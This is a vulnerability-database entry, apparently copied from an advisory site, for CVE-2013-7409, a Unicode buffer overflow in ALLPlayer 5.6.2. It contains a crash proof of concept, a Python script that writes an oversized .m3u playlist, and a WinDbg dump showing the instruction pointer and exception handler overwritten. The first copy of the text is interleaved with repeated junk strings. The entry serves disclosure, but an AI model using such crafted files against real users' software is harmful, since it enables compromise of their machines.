ALLPlayer 5.6.2 Buffer Overflow

31   2019-08-05 08:08   nipc
漏洞信息
漏洞编号: 1309
CVE编号: CVE-2013-7409
漏洞类型: -
漏洞来源: cxs
发布日期: 2013-10-10
CVSS
CVSS值: 7.5/10
严重级别: 高危
利用范围: Remote
攻击复杂度: Low
认证级别: No required
漏洞描述

WLB-2013100060[***]http://cxsecurity.com/issue/WLB-2013100060[***]Bug: ALLPlayer 5.6.2 Buffer Overflow ( Ascii Version )[***]ALLPlayer 5.6.2 Buffer Overflow[***]2013-10-10 / 2014-11-02[***]metacom[***]High[***]CWE-119@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** [***]CVE-2013-7409@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893********[***]Yes[***]No[***]7.5/10[***]6.4/10[***]10/10[***]Remote[***]No required[***]Partial[***]Partial[***]Partial[***] Title: ALLPlayer Local Buffer Overflow PoC UNICODE @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Vendor: http://www.allplayer.org/download/allplayer@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Date found: 09.10.2013@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Date published: 09.10.2013@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Platform: windows 7 German@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** Bug: Buffer Overflow UNICODE@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----------------------------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 1)VERSIONS AFFECTED@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ALLPlayer 5.6.2@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 2)Proof of Concept@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ------------------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** junk = "http://"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** buffer="\x41" * 5000@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** exploit = junk + buffer @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** try:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** out_file = open("ALLPlayer_Poc.m3u",'w')@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** out_file.write(exploit)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** out_file.close()@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** print "Exploit file created!" @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** except:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** print "Error"@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** @@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 3)-(DEBUG)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ----------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** (1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** *** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ALLPlayer+0x10041:@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 0:000> !exchain@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** ---------------@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893******** 0012e4b0: ALLPlayer+1b7037 (005b7037)@@@@@@@@@@$$$$$$$$$$&&&&&&&&&&##########suijishu0518893***

POC

Title: ALLPlayer Local Buffer Overflow PoC UNICODE Vendor: http://www.allplayer.org/download/allplayer Date found: 09.10.2013 Date published: 09.10.2013 Platform: windows 7 German Bug: Buffer Overflow UNICODE ---------------------------- 1)VERSIONS AFFECTED ---- ALLPlayer 5.6.2 2)Proof of Concept ------------------ junk = "http://" buffer="\x41" * 5000 exploit = junk + buffer try: out_file = open("ALLPlayer_Poc.m3u",'w') out_file.write(exploit) out_file.close() print "Exploit file created!" except: print "Error" 3)-(DEBUG) ---------- (1e60.1dec): Access violation - code c0000005 (!!! second chance !!!) *** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000 eip=00410041 esp=000311c4 ebp=000311e4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 ALLPlayer+0x10041: 00410041 008bc0ff2504 add byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=?? 0:000> !exchain --------------- 0012e4b0: ALLPlayer+1b7037 (005b7037) 0012e734: ALLPlayer+10041 (00410041) Invalid exception stack at 00410041 4)Credits --------- metacom Contact : metacom27 at gmail.com